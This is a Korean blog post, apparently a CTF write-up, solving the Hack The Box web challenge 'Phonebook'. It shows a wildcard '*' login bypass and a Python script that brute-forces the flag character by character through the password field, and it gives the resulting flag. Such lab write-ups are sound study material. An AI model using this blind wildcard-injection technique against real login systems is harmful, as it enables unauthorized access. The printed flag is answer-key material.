ursobad
ursobad
ursobad
전체 방문자
오늘
어제
  • 분류 전체보기 (116)
    • Emotion (35)
      • 파이썬 (10)
      • 문제 (10)
      • 인공지능 기초 (15)
    • Best of the Best (3)
    • Hacking (58)
      • HackCTF (12)
      • DreamHACK (7)
      • Webhacking.kr (19)
      • Root Me (6)
      • HTB (5)
      • 기타 (7)
      • 리버싱 소수전공 (2)
    • 기능반 (16)
      • 2과제 (14)
      • 3과제 (2)
    • 기록 (3)
    • 짧은 글들 (0)
    • 기타 (1)
    • Zombie (0)

블로그 메뉴

  • 홈
  • 태그
  • 방명록

공지사항

인기 글

태그

  • Python
  • OpenCV
  • BoB 질문
  • Bob
  • 얼굴검출
  • BoB 자기소개
  • BoB 자기소개서
  • BoB 면접
  • 구독자 전용 다시보기
  • BoB 필기
  • 머신러닝
  • 함수
  • KNN
  • BoB 11기
  • 123
  • BoB 자소서
  • 앙상블
  • 파이썬
  • 백준
  • 의사결정트리

최근 댓글

최근 글

티스토리

hELLO · Designed By 정상우.
ursobad
Hacking/HTB

WEB - Phonebook

WEB - Phonebook
Hacking/HTB

WEB - Phonebook

2021. 5. 30. 00:42

이런 창이 나온다

이문제는 지훈이랑 같이 풀었는데 지훈이가 "Reese" 이게 U sername이 아니냐고 해서 Reese를 Username에다 박고 Password를 막 입력하다가 *를 입력하니까 로그인이 됬다.

 

근데 여기서 flag를 어디서 얻어야되는지 모르겠어서 승준이한테 코딩해서 풀어야되냐고 물어봤는데 해서 풀어야된데서 {flag}*이런식으로 브루트포스 해서 풀어야되는것 같아서 파이썬으로 코딩했다.

import requests
s =requests.session()
url = "http://167.99.88.212:31775/login"
data = {"username":"Reese", "password":""}
flag ='HTB{d'
while True:
    for i in range(32, 128):
        data = {"username":"Reese", "password":f"{flag}{chr(i)}*"}
        if chr(i) == "*":
            continue
        a = s.post(url, data=data)
        if "No search results." in a.text:
            flag+=chr(i)
            break
    print(flag)

 

이렇게 flag가 뽑힌다.

HTB{d1rectory_h4xx0r_is_k00l}

저작자표시 (새창열림)

'Hacking > HTB' 카테고리의 다른 글

Mobile - Cat  (0) 2021.05.30
Misc - misDIRection  (0) 2021.05.30
WEB - Templated  (0) 2021.05.30
WEB - Emdee five for life  (0) 2021.05.30
    'Hacking/HTB' 카테고리의 다른 글
    • Mobile - Cat
    • Misc - misDIRection
    • WEB - Templated
    • WEB - Emdee five for life
    ursobad
    ursobad

    티스토리툴바

    단축키

    내 블로그

    내 블로그 - 관리자 홈 전환
    Q
    Q
    새 글 쓰기
    W
    W

    블로그 게시글

    글 수정 (권한 있는 경우)
    E
    E
    댓글 영역으로 이동
    C
    C

    모든 영역

    이 페이지의 URL 복사
    S
    S
    맨 위로 이동
    T
    T
    티스토리 홈 이동
    H
    H
    단축키 안내
    Shift + /
    ⇧ + /

    * 단축키는 한글/영문 대소문자로 이용 가능하며, 티스토리 기본 도메인에서만 동작합니다.